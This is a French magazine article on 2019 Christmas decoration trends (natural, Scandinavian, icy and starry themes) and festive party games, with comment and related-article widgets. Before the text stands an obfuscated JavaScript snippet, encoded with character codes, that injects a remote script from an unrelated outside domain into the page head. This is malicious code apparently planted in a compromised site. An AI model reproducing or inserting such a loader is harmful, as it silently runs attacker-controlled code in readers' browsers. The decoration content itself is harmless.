Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    Si vous voulez être tendance pour Noël, rien de plus simple, misez sur une déco green et nature…

    La nature s’invite à table pour une déco très nature.

    Rien de neuf sous le sapin… La bonne nouvelle c’est que vous n’avez pas à jeter vos cartons de décorations de Noël. Déjà très populaire ces dernières années, la déco traditionnelle sera encore le succès de l’année 2019. Certains appelleront cela un Noël scandinave, d’autres un Noël naturel, dans tous les cas, les objets en bois ou en verre seront incontournables, avec ce petit côté artisanal ou vintage qui fait mouche. Le Do it Yourself est aussi à la mode, alors pourquoi ne pas confectionner vous-même vos suspensions en papier, carton ou tissu… Pour les couleurs, là encore, le traditionnel revient en force avec du vert et du rouge, sans oublier quelques notes de doré. On ne change pas une déco qui gagne. Et pour le sapin, la tendance est évidemment au sapin naturel, mais seulement si vous prenez soin de le déposer dans un lieu dédié à son recyclage une fois les fêtes passées !

    Une maison à l’accent végétal

    Pour une Noël Green jusqu’au bout de la table, n’hésitez pas à agrémenter votre déco de végétaux. Plantes, fleurs séchées, branchages de sapin, bouquets de gui et même brins d’eucalyptus, la nature envahit votre maison… La déco de table peut prendre une atmosphère forestière ou carrément plus exotique avec des feuilles de palmier suivant vos goûts. Vous pouvez rester simple en misant sur le vert ou oser une gamme automnale avec des dégradés d’orangés mis en valeur sur une nappe aux couleurs foncées allant du bleu profond au noir. Dans tous les cas, il faudra disséminer des végétaux séchés sur les tables ou dans des vases. Et pour répondre à tout ce vert qui s’épanouit dans votre déco, vous pouvez parsemer votre intérieur d’objets brillants et en métal (laiton ou argent) pour un côté végétal urbain. Avec cette tendance naturelle, on assiste bien évidemment aussi au renouveau de la couronne de Noël, avec des branchages ou des végétaux entrelacés. On peut aussi remarquer que le sapin a tendance à disparaitre au profit des plantes vertes ou des plantes tropicales de la maison qui se parent de guirlandes scintillantes pour remplacer le roi des forêts…

    Les décos décalées

    Si vous voulez sortir des sentiers battus, vous trouverez tout de même deux tendances un peu en marge : le Noël glacé et le Noël étoilé. L’un mise sur le blanc et le polaire avec une déco ambiance Pôle Nord doux et chaleureux, l’autre s’inspire du 50e anniversaire du premier pas sur la lune avec une déco ciel étoilé, des motifs lune et un thème très astral qui s’appuie sur le bleu profond à la mode cette année

     

    Animez Noël avec une touche d’originalité

    Afin de rendre Noël encore plus festif et original voici quelques idées…

    • Le Père Noël secret : Pour éviter de dépenser des fortunes en cadeaux et rendre la chose plus ludique, la famille peut décider de jouer au Père Noël secret. Quelques semaines avant le réveillon, chacun tire au sort le nom d’un proche (qu’il devra garder secret) à qui il devra offrir un cadeau le soir de Noël.
    • Le concours de pull de Noël : Pour en finir avec le casse-tête de la tenue de soirée et retrouver la féerie et la joie simple du réveillon, vous pouvez lancer un concours de pulls de Noël. Renne, pingouins, Père Noël, bonhomme de neige, pulls lumineux, en relief ou à pompons, vous avez l’embarras du choix. Prévoyez une petite récompense pour le gagnant du concours.
    • Le Karaoké de Noël : tout le monde connaît les chants de Noël… enfin, c’est ce que l’on croit. Pourquoi ne pas faire un petit blindtest pour vérifier les connaissance de chacun sur ces chants traditionnels et leurs reprises par Mariah Carey, Wham… Et rien n’empêche de poursuivre en Karaoké, il existe de nombreuses playlist de Noël sous-titrées sur YouTube.
    • Une dégustation à l’aveugle : pour les gourmands, profitez du repas de réveillon pour un petit jeu de dégustation les yeux bandés. Préparez des toasts avec différents ingrédients, tentez même des mélanges rigolos et savourez en vous amusant…
    • Le labyrinthe de Noël : Pour les petits mais aussi pourquoi pas pour les grands, cachez une surprise dans la maison et attachez-la à une pelote de laine. Puis parcourez différentes pièces en déroulant la pelote puis accrochez un crayon au bout. Chacun choisira son crayon et devra y enrouler la ficelle afin de trouver le cadeau en suivant ce labyrinthe de ficelle.

    Commentez ou exprimez-vous grâce aux emojis !
    0
    J'AIMEJ'AIME
    0
    J'ADOREJ'ADORE
    0
    HahaHaha
    0
    WOUAHWOUAH
    0
    SUPER !SUPER !
    0
    TRISTETRISTE
    0
    GrrrrGrrrr
    Merci !
    • LE MAGAZINE URBAIN DU COURRIER PICARD Le Courrier picard, quotidien régional leader en Picardie, souhaitait répondre à un besoin grandissant des lecteurs : un magazine chic et tendance. C’est ainsi qu’est né «Instinct», un magazine harmonieux qui réunit 3 univers : la mode, la décoration et la culture.

    • Show Comments

    Your email address will not be published. Required fields are marked *

    comment *

    • name *

    • email *

    • website *

    You May Also Like

    Fatboy : Le design ici et maintenant

    Le garçon gras entré dans l’histoire du design au début des années 2000 est ...

    On a repéré pour vous les tendances de la rentrée !

    Qui dit septembre, dit rentrée et qui dit rentrée dit… nouvelle garde-robe ! Pour ...

    LES 5 TERRASSES AMIÉNOISES à ne pas manquer cet été

    LE SOLEIL REVIENT ET L’ENVIE DE PROFITER DE LA TERRASSE D’UN CAFÉ OU D’UN ...

    Telle mère, telle fille : les marques que l’on se transmet…

    La mode, c’est comme les recettes de cuisine… On y goûte quand on est ...

    Découvrez une maison de charme

    La rédaction vous propose de visiter un bien d’exception actuellement en vente dans la ...

    Les sorties à ne pas manquer en novembre

    UN DÉSORDRE VIVIFIANT ! Désordre, selon les organisateurs, est « une pièce patchwork vivifi ...